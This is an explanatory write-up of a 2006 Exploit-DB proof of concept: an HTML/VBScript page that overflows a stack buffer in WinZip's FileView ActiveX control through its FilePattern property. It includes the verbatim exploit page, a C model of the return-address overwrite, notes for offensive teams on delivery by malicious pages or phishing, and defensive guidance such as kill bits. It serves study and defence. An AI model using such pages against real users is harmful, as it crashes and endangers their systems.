WinZip FileView ActiveX Control Stack Overflow Explained

What this paper is
This paper is a Proof of Concept (PoC) exploit for a stack-based buffer overflow in the WinZip FileView ActiveX control shipped with WinZip 10.0.7245. It demonstrates how an attacker could crash the application hosting the control (a denial of service) by assigning an overly long string to the control's FilePattern property from script on a web page. The original posting titles it an "Unsafe Method Exposure" vulnerability: the control exposes a property to script that does not bound-check what it is given.
Simple technical breakdown
ActiveX controls are native COM components that can be embedded in web pages or applications to add functionality; when loaded in a browser they run as native code inside the browser's process. The WinZip FileView control exposes a FilePattern property to script. Setting it hands the caller's string to the control's native property setter, which copies it into a fixed-size buffer on the stack without checking the length. A sufficiently long value runs past that buffer and overwrites adjacent stack data, including the saved return address; in the simplest case the function returns to an invalid address and the host crashes, and in a more sophisticated exploit the overwritten return address could be steered to attacker-controlled code. This PoC stops at the crash: the value it assigns is a readable repeating pattern, not a tuned payload.
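The following C model is an added illustration written for this page; it is not WinZip's code and makes no claim about the real control's frame layout. It assumes a 256-byte local buffer and a conventional 32-bit frame (buffer, then saved EBP, then return address), rebuilds the PoC's 2,070-byte string, and shows which bytes of the pattern land in the return-address slot, next to a length-checked setter that rejects the same input:

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added model, not WinZip's code. The 256-byte buffer and the frame layout
 * below are assumptions chosen to illustrate the bug class. */
#define PATTERN_TOKEN   "STACKBASEDOVERFLOW"
#define PATTERN_REPEATS 115          /* the PoC literal: 115 x 18 = 2070 bytes */
#define FILEPATTERN_MAX 256          /* assumed size of the setter's local buffer */
#define SENTINEL        0x11223344u  /* stands in for the real return address */

/* A 32-bit callee frame: local buffer, then saved EBP, then return address.
 * Modelling it as a struct keeps the overwrite observable without undefined
 * behaviour in this demo. */
struct frame_model {
    char     file_pattern[FILEPATTERN_MAX];
    uint32_t saved_ebp;
    uint32_t return_address;
};

/* Rebuild the PoC string ("STACKBASEDOVERFLOW" x 115). Returns its length. */
size_t build_poc_pattern(char *out, size_t cap) {
    size_t tok = strlen(PATTERN_TOKEN), n = 0;
    for (int i = 0; i < PATTERN_REPEATS && n + tok < cap; i++) {
        memcpy(out + n, PATTERN_TOKEN, tok);
        n += tok;
    }
    out[n] = '\0';
    return n;
}

size_t poc_pattern_length(void) {
    char buf[PATTERN_REPEATS * 18 + 1];
    return build_poc_pattern(buf, sizeof buf);
}

/* Vulnerable setter: strcpy semantics, trusts the caller's length. The copy
 * is capped at the model's size so the demo stays in bounds; a real strcpy
 * keeps writing up the stack until the source string ends. */
void put_FilePattern_vulnerable(struct frame_model *f, const char *value) {
    size_t len = strlen(value);
    if (len > sizeof *f) len = sizeof *f;
    memcpy((char *)f, value, len);
}

/* Hardened setter: rejects anything that does not fit, including the NUL.
 * Returns 0 on success, -1 on rejection (E_INVALIDARG in COM terms). */
int put_FilePattern_hardened(struct frame_model *f, const char *value) {
    size_t len = strlen(value);
    if (len >= FILEPATTERN_MAX) return -1;
    memcpy(f->file_pattern, value, len + 1);
    return 0;
}

/* Which 4 bytes of the cyclic token land at a given byte offset from the
 * start of the buffer: pure arithmetic, used to cross-check the model. */
void token_bytes_at(size_t offset, char out[5]) {
    size_t tok = strlen(PATTERN_TOKEN);
    for (size_t i = 0; i < 4; i++) out[i] = PATTERN_TOKEN[(offset + i) % tok];
    out[4] = '\0';
}

size_t return_slot_offset(void) { return offsetof(struct frame_model, return_address); }

/* Feed the PoC string to the vulnerable setter; return 1 if the bytes now in
 * the return-address slot equal expect4 and agree with token_bytes_at(). */
int vulnerable_overwrites_return_with(const char *expect4) {
    char poc[PATTERN_REPEATS * 18 + 1], got[5], predicted[5];
    struct frame_model f;
    memset(&f, 0, sizeof f);
    f.return_address = SENTINEL;
    build_poc_pattern(poc, sizeof poc);
    put_FilePattern_vulnerable(&f, poc);
    memcpy(got, &f.return_address, 4);
    got[4] = '\0';
    token_bytes_at(return_slot_offset(), predicted);
    return strcmp(got, expect4) == 0 && strcmp(got, predicted) == 0;
}

/* Same input through the hardened setter; return 1 if it was rejected and
 * the frame (buffer and return address) is untouched. */
int hardened_rejects_oversize(void) {
    char poc[PATTERN_REPEATS * 18 + 1];
    struct frame_model f;
    memset(&f, 0, sizeof f);
    f.return_address = SENTINEL;
    build_poc_pattern(poc, sizeof poc);
    int rc = put_FilePattern_hardened(&f, poc);
    return rc == -1 && f.return_address == SENTINEL && f.file_pattern[0] == '\0';
}

int main(void) {
    char bytes[5];
    token_bytes_at(return_slot_offset(), bytes);
    printf("PoC string: %zu bytes; return slot at offset %zu receives \"%s\"\n",
           poc_pattern_length(), return_slot_offset(), bytes);
    printf("vulnerable setter overwrote return address: %s\n",
           vulnerable_overwrites_return_with(bytes) ? "yes" : "no");
    printf("hardened setter rejected the input: %s\n", hardened_rejects_oversize() ? "yes" : "no");
    return 0;
}
```

Because the token repeats every 18 bytes, the value that lands at any stack offset is simply pattern[offset mod 18]; with the assumed layout the return-address slot at offset 260 receives "EDOV" (0x564F4445 read little-endian), which is exactly the kind of value a debugger shows in EIP after such a crash. Changing FILEPATTERN_MAX shows how the landing bytes shift, which is the reasoning behind cyclic patterns used to locate the return-address offset in a real target.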
Complete code and payload walkthrough
The provided source is an HTML file containing a VBScript event handler and an ActiveX <OBJECT> definition. The skeleton below shows the structure; the handler body is written here as a loop that builds the same 2,070-byte string ("STACKBASEDOVERFLOW" repeated 115 times) that appears as a single literal in the verbatim listing at the end of this page.
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<SCRIPT LANGUAGE="VBScript">
<!--
Sub WZFILEVIEW_OnAfterItemAdd(Item)
    ' Build "STACKBASEDOVERFLOW" x 115 (2,070 bytes), then assign it to the property
    Dim s, i
    For i = 1 To 115
        s = s & "STACKBASEDOVERFLOW"
    Next
    WZFILEVIEW.FilePattern = s
End Sub
-->
</SCRIPT>
<OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200
CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904">
</OBJECT>
</BODY>
</HTML>
- <HTML>, <HEAD>, <TITLE>, <BODY> and their closing tags: standard HTML structure. They exist only to host the control and the script.
- <SCRIPT LANGUAGE="VBScript"> ... </SCRIPT>: the VBScript block. VBScript was supported by Internet Explorer and other Microsoft script hosts of the period.
- <!-- ... -->: HTML comment markers inside the script block, the old idiom for hiding script source from browsers that do not understand the script element.
- Sub WZFILEVIEW_OnAfterItemAdd(Item) ... End Sub: a VBScript event handler. In Internet Explorer's VBScript binding, a procedure named <ObjectID>_<EventName> is wired automatically to that event of the named object, so this runs when the control raises OnAfterItemAdd. Nothing else on the page calls it, so the PoC relies on the control firing that event once it has been instantiated.
- WZFILEVIEW.FilePattern = ...: the core of the PoC. It assigns a value to the control's FilePattern property, which hands the string to the control's native property setter.
- "STACKBASEDOVERFLOWSTACKBASEDOVERFLOW...": the oversized value, 115 repetitions of the 18-byte token, 2,070 bytes by count. It is far larger than the stack buffer the setter copies it into, so the copy runs past the buffer and overwrites adjacent stack data (saved frame pointer, return address, other locals). The readable token makes the corrupted values easy to recognise in a debugger; the string is not tuned to any particular offset, so the result is a crash rather than controlled execution.
- <OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200 CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904"> </OBJECT>: embeds an ActiveX control in the page.
- ID="WZFILEVIEW": the programmatic identifier scripts use to reference the object, and the prefix VBScript uses to bind event-handler procedures to it.
- WIDTH=200 HEIGHT=200: display dimensions of the control on the page.
- CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904": the class identifier the browser looks up in the registry (under HKEY_CLASSES_ROOT\CLSID) to locate and load the control's binary. This CLSID is the WinZip FileView ActiveX control.
Mapping of code fragments to practical purpose:
- WZFILEVIEW.FilePattern = "...": trigger the vulnerability by assigning an oversized string to the FilePattern property. This is the direct action that causes the stack overflow.
- CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904": identify and instantiate the vulnerable WinZip FileView ActiveX control.
Payload/Shellcode:
There is no explicit shellcode or multi-stage payload in this PoC. The "payload" is simply the excessively long string designed to cause a stack buffer overflow, leading to a denial-of-service (crash) of the application hosting the ActiveX control.
Practical details for offensive operations teams
- Required Access Level: Typically, this exploit would be delivered via a web page or a document that can host ActiveX controls. This means the target user needs to be able to browse to a malicious URL or open a specially crafted file. No elevated privileges are required on the target system itself, beyond the ability to run the application hosting the ActiveX control (e.g., Internet Explorer, or an application that embeds it).
- Lab Preconditions:
- A vulnerable version of WinZip installed on the target machine.
- An application that uses the WinZip FileView ActiveX control (e.g., older versions of Internet Explorer, or custom applications that embed it).
- The target machine must have the ActiveX control registered.
- Tooling Assumptions:
- A web server to host the HTML PoC file.
- A web browser that renders HTML, runs VBScript, and instantiates ActiveX controls from a web page, i.e. Internet Explorer with ActiveX and Active Scripting enabled for the zone serving the page. IE6-era defaults allowed this; IE7 (released in 2006) added ActiveX opt-in prompts for controls not previously used from the browser, and later versions tightened further.
- A text editor to create the HTML PoC.
- Execution Pitfalls:
- Browser Security Settings: later browsers, and older ones with security updates, block or prompt before running an ActiveX control, and Internet Explorer refuses outright to load a control whose CLSID carries the kill bit. The PoC fails if the user declines the prompt or the control has been kill-bitted.
- ActiveX Registration: the control must be installed and registered on the target system. If it is not present, the <OBJECT> tag fails to instantiate it and nothing happens.
- Control Version: the PoC is specific to WinZip 10.0.7245. Other versions may not be vulnerable or may register a different CLSID.
- Environment Differences: the exact behaviour, and the string length needed to reach the return address, may vary with the operating system version, service packs, and the application hosting the control.
- Telemetry:
- Network: HTTP request(s) to the web server hosting the PoC page.
- Process: creation of the hosting application process (e.g., iexplore.exe) followed by its loading of the WinZip control's module.
- Application Crash: the hosting application (e.g., Internet Explorer) terminates unexpectedly. Windows records an Application Error event (Event ID 1000 in the Application log) naming the faulting application and module, and Windows Error Reporting may generate a crash report.
- Memory Corruption: a debugger attached to the process shows an access violation, with stack contents (and, in a typical frame layout, the faulting instruction pointer) filled with bytes from the "STACKBASEDOVERFLOW" pattern.
Where this was used and when
This exploit was published in 2006. ActiveX vulnerabilities were prevalent in the early to mid-2000s, particularly when used with Internet Explorer. Such vulnerabilities were commonly exploited through malicious websites or email attachments that embedded these controls. The specific context would be an attacker hosting this HTML file on a compromised web server or sending it as part of a phishing campaign.
Defensive lessons for modern teams
- Avoid Legacy Technologies: ActiveX is unsandboxed native code that runs with the browser's privileges. It is unsupported by current browsers and should not be relied on in new development.
- Patch Management: keeping software up to date, including any application that still hosts ActiveX controls, is crucial. The primary defense, though, is to remove the vulnerable technology rather than to keep patching it.
- Browser Security Sandboxing: current browsers (Edge, Chrome, Firefox) do not support ActiveX at all, and Internet Explorer itself is retired; where IE mode or legacy hosts remain, their process sandboxes limit what a compromised renderer can reach, but a native control still runs in-process, so the sandbox does not protect against the control's own bugs.
- Kill Bits and Application Control: Internet Explorer will not load a control whose CLSID has the kill bit set (a REG_DWORD named "Compatibility Flags" with value 0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}). Setting it for A09AE68F-B14D-43ED-B713-BA413F034904 neutralises this PoC even with the vulnerable WinZip still installed. Application control policies (e.g., allow-listing of binaries) further restrict which components may load at all.
- Web Gateways and URL Filtering: a WAF protects servers, not browsing users, so it does little against a client-side exploit like this. The relevant network control is a secure web gateway or URL filtering that blocks known-malicious pages.
- Endpoint Detection and Response (EDR): EDR solutions can detect process crashes, suspicious memory activity, and network connections to malicious sites, providing visibility into exploitation attempts.
ASCII visual (if applicable)
This exploit is client-side and relies on the interaction between a web page and a vulnerable ActiveX control within a hosting application. A simple visual representation:
+---------------------+ +-----------------------+ +-----------------------+
| Attacker's Web |----->| Target User's Browser |----->| Hosting Application |
| Server (PoC HTML) | | (e.g., IE) | | (e.g., IE, WinZip) |
+---------------------+ +-----------------------+ +----------+------------+
|
| Instantiates
| Vulnerable
| ActiveX
v
+-----------------------+
| WinZip FileView |
| ActiveX Control |
| (Vulnerable Version) |
+----------+------------+
|
| Sets FilePattern
| property to a
| 2,070-byte
| string
v
+-----------------------+
| Stack Buffer Overflow |
| -> Crash / DoS |
+-----------------------+
Source references
- Paper ID: 2783
- Paper Title: WinZip 10.0.7245 - FileView ActiveX Control Stack Overflow (PoC)
- Author: prdelka
- Published: 2006-11-14
- Keywords: Windows, dos
- Paper URL: https://www.exploit-db.com/papers/2783
- Raw URL: https://www.exploit-db.com/raw/2783
Original Exploit-DB Content (Verbatim)
<!--
WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability
-- prdelka
-->
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<SCRIPT LANGUAGE="VBScript">
<!--
Sub WZFILEVIEW_OnAfterItemAdd(Item)
WZFILEVIEW.FilePattern =
"STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS
EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLO
WSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS
EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLO
WSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS
EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLO
WSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS
EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLO
WSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS
EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLO
WSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW"
end sub
-->
</SCRIPT>
<OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200
CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904">
</OBJECT>
</BODY>
</HTML>
# milw0rm.com [2006-11-14]